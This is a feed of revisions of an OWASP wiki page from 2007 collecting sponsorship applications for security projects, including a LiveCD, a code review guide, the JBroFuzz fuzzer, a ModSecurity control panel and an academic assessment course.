I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP liveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis. Not once a year like other liveCDs. The CD will also include specialty tools and documentation to perform VOIP, RFID,Bluetooth, and wireless security assessments.<br />
<br />
<br />
----<br />
<br />
== Mark Curphey – The OWASP Web Security Certification Framework ==<br />
<br />
'''Problem'''<br />
<br />
PCI DSS is attracting a lot of criticism for a lot of valid reasons. <br />
<br />
http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/<br />
<br />
http://blogs.csoonline.com/node/210<br />
<br />
http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html<br />
<br />
The list is of course long and not appropriate here……and while its easy to knock PCI, there is nothing better out there. <br />
<br />
'''Solution and Deliverables'''<br />
<br />
As opposed to me continuing saying what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to simply create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. We won't get bogged down in the politics up-front, but hold something good up to the world for people to adopt. This project would of course draw on and bring together many of the other OWASP Projects including the Guide (What is a secure web app), Testing Guides (How to test for a secure web app), WebGoat (part of how to certify an individual understands and can find web app issues) etc. Many of those projects may not be complete or a perfect fit today, but this project can bring a common connecting theme to a lot of very valuable IP that OWASP has built over the years. I will also create it in such as way that a corporate could adopt/adapt it themseles as well as an industry. Where other OWASP projects are not complete or currently suitable I will build a requirements doc that can be considered by those teams if they feel appropriate. <br />
<br />
This project would address the;<br />
<br />
'''Standard''' <br />
*A complete auditable (important) web site security standard suitable for modern e-commerce companies including<br />
**The technical things people should care about<br />
**The operational / management things people should care about<br />
'''Certification Model''' <br />
*A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc). This will include for example the model for certifying auditors (including the actual test program); checklists and forms for auditors to complete and other supporting material. <br />
<br />
Essentially its a complete blueprint for an organisation like OWASP or a regulatory body need to run a web site security certification program complete with the supporting material to implement it.<br />
<br />
Note: This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete but I think is very important for the industry and for potentially for OWASP. I wanted to gauge the interest by first posting this.<br />
<br />
== Erwin Geirnaert - OWASP Java Project ==<br />
<br />
* '''Executive Summary''':<br />
I would like to help the OWASP Java Project to gather all Java security related information and to document any domains that lack documentation.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
The main objective I see is to gather all information in one place, where security experts and developers can find the information they need.<br />
In order to get there, I need to collect all information in the OWASP Wiki, ask people if they want to donate it to OWASP so that we can include it as public material, add URLs, white-papers, references to books, ... And if time permits, write some documentation myself.<br />
<br />
One deliverable is the OWASP Top 10 for J2EE applications with clear examples of vulnerabilities and mitigations.<br />
<br />
* '''Why you should be sponsored for the project''':<br />
I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.<br />
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.<br />
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...<br />
I'm also member of the OWASP Belgium board that started in March 2007.<br />
<br />
== Erwin Geirnaert - OWASP WebGoat Solutions Guide ==<br />
<br />
* '''Executive Summary''':<br />
WebGoat is used by a lot of people to learn about web application security and the different vulnerabilities. But it takes a lot of time to grasp how the tools like WebScarab work and how to use them effectively in WebGoat. I propose to create a walkthrough of the lessons in WebGoat so that people can learn from the solutions, without spoiling the fun.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
The WebGoat Solutions Guide is a document that can be bundled with WebGoat. Each lesson contains a detailed solution with screenshots and tools. I created a PDF with the solution for WebGoat 4.0 but this is too big to load (15 MB) and is not very practical.<br />
<br />
After a discussion with Bruce about this, we think that the solutions should be made like the existing Lessons Plan so it is easier to maintain and update when a lesson changes. This means that there will be documentation folder and an individual solution for each lesson. <br />
<br />
* '''Why you should be sponsored for the project''':<br />
I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.<br />
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.<br />
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...<br />
I'm also member of the OWASP Belgium board that started in March 2007.<br />
<br />
== Bunyamin Demir – OWASP WeBekci Project ==<br />
<br />
==== Executive Summary: ====<br />
<br />
Web application firewalls (WAF) are gaining importance among the information security technologies designed to protect web sites from attack. WAF solutions prevent attacks that network firewalls and intrusion detection systems can't and they require no modification of application source code. ModSecurity [http://www.modsecurity.org/] is an open source web application firewall that runs as an Apache module. It is an embeddable web application firewall and it provides protection from a range of attacks against web applications. It is an open source project available to everyone; it however does not come with an admin panel. <br />
<br />
I decided to provide this essential tool with a control panel which I believe will ease and thus encourage its usage.<br />
<br />
ModSecurity allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure. My main goal is to analyze attacks and generate rules to change the configuration of the ModSecurity accordingly.<br />
<br />
ModSecurity has a feature called “flexible rule engine” as its heart of Attack Prevention capability . It uses ModSecurity’s “Rule Language,” (a programming language designed to work with HTTP transaction data). It is easy to use and flexible; yet the system administrators need to learn its own rules to create what is called “Certified ModSecurity Rules” to be implemented. My control panel will automate the major code-generation in Rule Language. <br />
<br />
==== Objectives and Deliverables: ====<br />
<br />
* '''Configuration''' : Will add all configuration parameter<br />
* '''Rule Generator''': Will write all the Rules in Rule Language<br />
* '''Logging''' : Auditlog and debuglog will be added.<br />
* '''Multiple-DB''' : Will add PostgreSql and Sqlite support.<br />
<br />
==== Why I should be sponsored for the project: ====<br />
<br />
I am involved with OWASP Turkey [http://www.owasp.org/index.php/Turkey] and interested very much in WAF. Even though this is my first project for OWASP, I am very much interested in every aspect of ModSecurity. With SpoC007’s support I will finalize my work on OWASP WeBekci [http://www.owasp.org/index.php/Category:OWASP_WeBekci_Project].<br />
<br />
== Eric Sheridan and Dr. Goran Trajkovski - The Scholastic Application Security Assessment Project ==<br />
<br />
=== ABSTRACT ===<br />
<br />
One of the major goals of the Open Web Application Security Project is to educate developers in the field of application software security. Understanding the risks and threats associated with web application software is pivotal in building a mature application security process. While OWASP has made a significant impact in the professional industry, more time and energy should be focused towards the academic community. It is an unfortunate fact that most universities do not require a stringent software security course for their computer science students. Consequently, most young developers do not have the ability to assess and mitigate the risks and threats for their own applications. It is for this reason that we believe the Open Web Application Security Project should fund an initiative to encourage the adaptation of application software security methodologies in the academic course curriculum.<br />
<br />
The Scholastic Application Security Project is intended to be the first step towards integrating security requirements in academic course curriculums. The primary goal of the project is to give students hands-on experience performing application security assessments using the tools and documentation found at http:///www.owasp.org. The assessment, lead by an application security professional, will demonstrate to students how the information and tools found at OWASP can be used to assess and ultimately increase the overall security posture of a web application. <br />
<br />
This project contributes towards bridging the gap between academia and industry, by equipping students with hands-on ready-for-the-job-market skills in the application software securing industry.<br />
<br />
=== PARTICIPANTS ===<br />
<br />
The Scholastic Application Security Assessment Project requires that college level students, lead by an application security professional, perform a security audit on an open source web application using the tools and information available at OWASP.<br />
<br />
::*'''Application Security Professional''' – Eric Sheridan ([http://www.aspectsecurity.com Aspect Security])<br />
::*'''Towson University (TU) Partner''' – Dr. Goran Trajkovski, Towson University (http://www.towson.edu)<br />
::*'''Students''' – Students of TU’s Application Software Security Course (COSC 458), nominated by the TU Partner<br />
::*'''Web Application''' – The Open WebMail Project (http://openwebmail.org/)<br />
<br />
=== OWASP UTILIZATION ===<br />
<br />
The Scholastic Application Security Assessment Project requires heavy utilization of existing OWASP tools and utilities. Through this requirement, the project will illustrate the fact that existing OWASP resources can be used and heavily relied upon in a professional security audit. The following is a list of notable OWASP resources whose use will be documented throughout the assessment:<br />
<br />
::*'''OWASP Top Ten 2007''' - The security critical areas that the students will assess in the review<br />
::*'''OWASP Testing Guide v2''' – The primary resource for building penetration testing cases<br />
::*'''OWASP Guide''' – The primary resource for technical details pertaining to a technology and/or vulnerability<br />
::*'''OWASP WebScarabNG''' – The primary proxy utility used throughout the assessment<br />
<br />
=== THE FINAL REPORT ===<br />
<br />
Students are required to follow the principle of “responsible disclosure” during the course of the security assessment. The developers of the open source application will be notified if any significant issues are found. Once the assessment is complete, a final report will be delivered to the application developers and the appropriate OWASP Spring of Code personnel. For each finding in the report, the students will be required to describe how the tools and information found at OWASP were used in the discovery.<br />
<br />
=== HOW DOES OWASP BENEFIT? ===<br />
<br />
The Scholastic Application Security Assessment Project is specifically designed to benefit the OWASP brand:<br />
<br />
''The OWASP Community…''<br />
::*will be provided a case study proving that the resources available at OWASP can be utilized in an academic environment, that can be later used in advertising the OWASP efforts to similar programs as the one at TU.<br />
::*will be providing students a hands on experience in learning and testing for the latest web application security threats, thus potentially enlarging the OWASP community of contributors and supporters.<br />
::*will be addressing the need to educate developers in the security critical areas.<br />
::*will be seen as offering a professional level service to another open source project.<br />
::*will be addressing one of the root causes of application software insecurity.<br />
<br />
=== BACKGROUND ===<br />
<br />
'''Eric Sheridan:'''<br />
<br />
::*Earned a Bachelor’s of Science in Computer Science from Towson University<br />
::*Graduate Student in Information Security at Johns Hopkins University<br />
::*Application Security Engineer at Aspect Security<br />
::*Lead of the OWASP Stinger Project and the OWASP Validation Project<br />
<br />
'''Goran Trajkovski, PhD:'''<br />
<br />
::*Has been teaching the Application Software Security course for the Computer Security undergraduate and master-level majors at TU since 2004 (TU has been a Center of Excellence in Information Assurance, designated by the NSA since 2002).<br />
::*Assistant professor of Computer and Information Sciences at Towson University, and Director of its Cognitive Agency and Robotics Lab (CARoL).<br />
::*Has lead curricular efforts in integrating application software security topics throughout the Computer Science and Computer Information Sciences curriculum<br />
::*12 years of full time teaching experience in higher ed.</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&diff=17413OWASP Spring Of Code 2007 Applications2007-03-26T10:14:27Z<p>Mcurphey: </p>
<hr />
<div>This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]<br />
<br />
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''<br />
<br />
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application<br />
<br />
---------<br />
<br />
<br />
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:<br />
<br />
== {Your first name or Alias} - {Project name} ==<br />
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].<br />
<br />
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.<br />
<br />
* Your educational and professional background<br />
<br />
* Application security experience and accomplishments<br />
<br />
* Participation and leadership in open communities<br />
<br />
* The opportunity, challenges, issues or need your proposal addresses<br />
<br />
* Objectives or ways in which you will meet the goal(s)<br />
<br />
* Specific activities and who will carry out these activities<br />
<br />
* Specific deliverables and a rough project schedule so we can track progress<br />
<br />
* Long-term vision for the project<br />
<br />
* Any other reasons why you and your project should be selected<br />
<br />
== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==<br />
<br />
I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of<br />
information systems security since 1994, when BBSes and Linux still lived together.<br />
<br />
A quick search for buanzo on google [http://www.google.com/search?hl=en&q=buanzo&btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].<br />
<br />
In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].<br />
<br />
=== Accomplishments ===<br />
<br />
I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed <br />
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written<br />
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing<br />
an Internet Draft to be proposed for RFC regarding Enigform.<br />
<br />
=== Community ===<br />
<br />
I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio<br />
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,<br />
answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].<br />
<br />
=== My Project ===<br />
<br />
Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].<br />
<br />
Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.<br />
<br />
Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].<br />
<br />
=== Long Term ===<br />
<br />
Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers<br />
and/or programming languages, and also provide OpenPGP De/Encryption support.<br />
<br />
<br />
=== Why should I be selected ===<br />
<br />
I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the<br />
international security community, and I firmly believe Enigform is my greatest idea so far.<br />
<br />
== Eoin Keary - Code review Project ==<br />
* '''Executive Summary''':<br />
I am proposing that I complete the OWASP Code review guide during this period.<br />
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. <br />
<br />
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.<br />
<br />
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.<br />
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.<br />
<br />
The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.<br />
Code review methodologies also need to be discussed.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
<br />
Update of the code review guide:<br />
* Add additional areas relating to the code review process such as:<br />
** Benefits and pitfalls<br />
** Methodology<br />
** The code review process<br />
*** Transactional analysis<br />
*** Managing the code review process<br />
*** Assigning risk to findings<br />
<br />
** Technical guides<br />
*** Language specific best practice <br />
*** Java <br />
*** .NET <br />
*** PHP <br />
*** MySQL <br />
*** Stored Procs <br />
*** C/C++ <br />
<br />
** Code review by vulnerability:<br />
*** Reviewing Code for Buffer Overruns and Overflows <br />
*** Reviewing Code for OS Injection<br />
*** Reviewing Code for SQL Injection<br />
*** Reviewing Code for Data Validation<br />
*** Reviewing code for XSS issues<br />
*** Reviewing Code for Error Handling<br />
*** Reviewing Code for Logging Issues<br />
*** Reviewing The Secure Code Environment<br />
*** Reviewing code for Authorization Issues<br />
*** Reviewing code for Authentication Issues<br />
*** Reviewing code for Session Integrity<br />
*** Reviewing code for Cross Site Request Forgery<br />
*** Reviewing code for Cryptography implementation issues<br />
*** Reviewing code Dangerous HTTP Methods (Deployment)<br />
*** Race Conditions <br />
<br />
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.<br />
<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
<br />
I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process. <br />
I also was the lead of the Testing guide until V2 was published via the Autumn of Code. <br />
<br />
I have always delivered any work I have volunteered for on time. <br />
<br />
I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.<br />
<br />
== Paolo Perego - Owasp Orizon Project ==<br />
* '''Executive Summary''':<br />
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.<br />
<br />
I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.<br />
<br />
Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.<br />
<br />
I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
Completing the static code review API section<br />
* improving programming language to XML translator<br />
* improving security best practices code review scan library<br />
* improving secure coding fashion best practices library<br />
* writing the pattern matching scan using the aformentioned libraries<br />
Writing the java source code enforment objects<br />
* writing an object to handle form data values to avoid XSS<br />
* writing an object to handle form data values to avoid SQL Injection<br />
* writing an object to handle HttpRequest and HttpSession objects<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.<br />
<br />
I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.<br />
I'm a developer too so I understand also the "dark side" of the problem developing code with security in mind.<br />
<br />
I work using the "release early release often" paradigm so to be concrete and let other people having something usable to work with.<br />
<br />
== Sebastien Deleersnyder - OWASP Education Project ==<br />
* '''Executive Summary''':<br />
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. <br />
<br />
Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. <br />
<br />
* '''Objectives and Deliverables''':<br />
Currently the project goals are to create Educational Tracks: <br />
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past<br />
* A "Web Application Security Primer" Track for beginners (4 hours) <br />
* A "What developers should know on Web Application Security" Track for developers (4 hours) <br />
<br />
* '''Why you should be sponsored for the project''': <br />
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.<br />
<br />
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.<br />
<br />
If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.<br />
<br />
* '''More details''': <br />
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.<br />
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.<br />
<br />
== Subere - OWASP JBroFuzz Project ==<br />
<br />
==== Overview ==== <br />
<br />
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.<br />
<br />
==== Fuzzing ==== <br />
<br />
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.<br />
<br />
==== Objectives ==== <br />
<br />
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):<br />
<br />
* '''Open Source Tab'''<br />
* '''NTLM Brute Force over HTTP/S Tab'''<br />
* '''Pure HTTP/S Fuzzing using HTTPClient'''<br />
* '''Blind SQL Injection Fuzzing Tab'''<br />
<br />
At the same time, the following existing tabs need to be updated and made more robust (details in next section):<br />
<br />
* '''TCP Fuzzing tab allowing graph outputs'''<br />
* '''TCP Sniffing tab update thread Agent Queue'''<br />
* '''Update Generators file format'''<br />
* '''Include SOAP and XML fuzzing'''<br />
<br />
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.<br />
<br />
==== Deliverables ==== <br />
<br />
Based on the above, the new code elements that will be added are as follows:<br />
<br />
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''<br />
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''<br />
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''<br />
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''<br />
<br />
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: <br />
<br />
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''<br />
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''<br />
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''<br />
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''<br />
<br />
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.<br />
<br />
==== Background ==== <br />
<br />
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. <br />
<br />
Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.<br />
<br />
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.<br />
<br />
==== Why should JBroFuzz be sponsored? ==== <br />
<br />
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.<br />
<br />
Keep the code platform independent adds a huge advantage. <br />
<br />
Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.<br />
<br />
== Joshua Perrymon - OWASP LiveCD Project ==<br />
* '''Executive Summary''':<br />
I am proposing that I complete the second version of the OWASP LiveCD during this period.<br />
The first version of the LiveCD is now available and include many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security proffesionals to perform application testing and training. <br />
<br />
In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This shouls start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also inlcude the wiki and ALL the tools developed for OWASP.<br />
<br />
* '''Objectives and Deliverables''':<br />
<br />
Update of the LiveCD:<br />
* Complete OWASP branding<br />
* Add OWASP wiki<br />
* Add encryption capabilities<br />
* Add more OWASP tools<br />
* Add more pen-test tools such as;<br />
VOIP, RFID, BlueTooth, Wireless, etc..<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
<br />
I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP liveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis. Not once a year like other liveCDs. The CD will also include specialty tools and documentation to perform VOIP, RFID,Bluetooth, and wireless security assessments.<br />
<br />
<br />
----<br />
<br />
== Mark Curphey – A Better Web Security Evaluation Criteria ==<br />
<br />
'''Problem''' <br />
PCI DSS is attracting a lot of criticism for a lot of valid reasons. <br />
<br />
http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/<br />
<br />
http://blogs.csoonline.com/node/210<br />
<br />
http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html<br />
<br />
The list is of course long and not appropriate here……<br />
<br />
'''Solution and Deliverables'''<br />
As opposed to continuing to say what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. This project would address the;<br />
<br />
'''Standard''' <br />
*The technical things people should care about<br />
*The operational / management things people should care about<br />
'''Business Model''' <br />
*A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc)<br />
<br />
Note: This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete but I think is very important for the industry and for potentially for OWASP. I wanted to gauge the interest by first posting this.</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&diff=17412OWASP Spring Of Code 2007 Applications2007-03-26T10:12:14Z<p>Mcurphey: </p>
<hr />
<div>This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]<br />
<br />
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''<br />
<br />
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application<br />
<br />
---------<br />
<br />
<br />
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:<br />
<br />
== {Your first name or Alias} - {Project name} ==<br />
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].<br />
<br />
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.<br />
<br />
* Your educational and professional background<br />
<br />
* Application security experience and accomplishments<br />
<br />
* Participation and leadership in open communities<br />
<br />
* The opportunity, challenges, issues or need your proposal addresses<br />
<br />
* Objectives or ways in which you will meet the goal(s)<br />
<br />
* Specific activities and who will carry out these activities<br />
<br />
* Specific deliverables and a rough project schedule so we can track progress<br />
<br />
* Long-term vision for the project<br />
<br />
* Any other reasons why you and your project should be selected<br />
<br />
== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==<br />
<br />
I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of<br />
information systems security since 1994, when BBSes and Linux still lived together.<br />
<br />
A quick search for buanzo on google [http://www.google.com/search?hl=en&q=buanzo&btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].<br />
<br />
In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].<br />
<br />
=== Accomplishments ===<br />
<br />
I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed <br />
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written<br />
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing<br />
an Internet Draft to be proposed for RFC regarding Enigform.<br />
<br />
=== Community ===<br />
<br />
I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio<br />
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,<br />
answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].<br />
<br />
=== My Project ===<br />
<br />
Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].<br />
<br />
Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.<br />
<br />
Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].<br />
<br />
=== Long Term ===<br />
<br />
